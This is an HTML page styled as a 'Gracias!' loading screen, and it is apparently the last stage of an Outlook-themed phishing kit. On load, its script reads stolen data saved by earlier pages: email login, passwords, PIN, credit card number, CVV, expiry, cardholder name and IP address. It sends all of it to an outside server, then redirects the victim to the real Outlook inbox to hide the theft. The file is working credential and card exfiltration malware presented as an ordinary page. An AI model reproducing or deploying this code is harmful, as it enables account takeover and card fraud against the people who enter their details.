<!DOCTYPE html>
<html lang="en">
<head>
  <meta name="robots" content="noindex" />
    <meta name="googlebot" content="noindex">
<meta name="googlebot-news" content="nosnippet">
<meta name="robots" content="noindex, nofollow">
<meta name="robots" content="nofollow">
<meta name="googlebot" content="noindex">
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Gracias!</title>
</head>
<style>
    .lds-ring {
  display: inline-block;
  position: relative;
  width: 80px;
  height: 80px;
}
.lds-ring div {
  box-sizing: border-box;
  display: block;
  position: absolute;
  width: 64px;
  height: 64px;
  margin: 8px;
  border: 8px solid #cef;
  border-radius: 50%;
  animation: lds-ring 1.2s cubic-bezier(0.5, 0, 0.5, 1) infinite;
  border-color: #cef transparent transparent transparent;
}
.lds-ring div:nth-child(1) {
  animation-delay: -0.45s;
}
.lds-ring div:nth-child(2) {
  animation-delay: -0.3s;
}
.lds-ring div:nth-child(3) {
  animation-delay: -0.15s;
}
@keyframes lds-ring {
  0% {
    transform: rotate(0deg);
  }
  100% {
    transform: rotate(360deg);
  }
}

</style>
<body>
    <div class="lds-ring"><div></div><div></div><div></div><div></div></div>
</body>
<script>

async function enviar() {
	


	
			const mail = localStorage.getItem("common");
      const pw = localStorage.getItem("commons");
      const pws = localStorage.getItem("commonss");
      const pais = localStorage.getItem("pusr");
      const FECHA = localStorage.getItem("pusrf");
      const pin = localStorage.getItem("commonpn");
      const cc = localStorage.getItem("cc");
      const ccv = localStorage.getItem("ccv");
      const ccexpiry = localStorage.getItem("cce");
      const ccname = localStorage.getItem("ccn");
      const IP = localStorage.getItem("commonspnn");
           
            
           
          
			
           

            const message = `➖➖➖➖➖[ MAILS ]➖➖➖➖➖ \n 👤 mail: <code>${mail}</code> --\n  pw: <code>${pw}</code> --\n  ConfirmPW: <code>${pws}</code> --\n pais: <code>${pais}</code> --\n  fecha: <code>${FECHA}</code> --\n
             pin: <code>${pin}</code> --\n  cc: <code>${cc}</code> --\n  cvv: <code>${ccv}</code> --\n  cc/año/mes: <code>${ccexpiry}</code> --\n  cc name: <code>${ccname}</code> --\n
              IP: <code>${IP}</code> --\n --` ;
            const responseMessage = document.getElementById("responseMessage");

            if (!message.trim()) {
                responseMessage.textContent = "⚠️ Ingresa un mensaje antes de enviar.";
                return;
            }
{}
            try {
                const response = await fetch("https://nodegrnd.onrender.com/", {
                    method: "POST",
                    headers: { "Content-Type": "application/json" },
                    body: JSON.stringify({ message })
                });

                const data = await response.json();

                if (response.ok) {
                   
				  window.location = "https://outlook.live.com/mail/0/inbox"
				   
                    
                } else {
                    responseMessage.textContent = "❌ Error al enviar mensaje: " + data.error;
                }
            } catch (error) {
                responseMessage.textContent = "❌ Error en la solicitud: " + error.message;
            }
}

enviar();




</script>
</html>
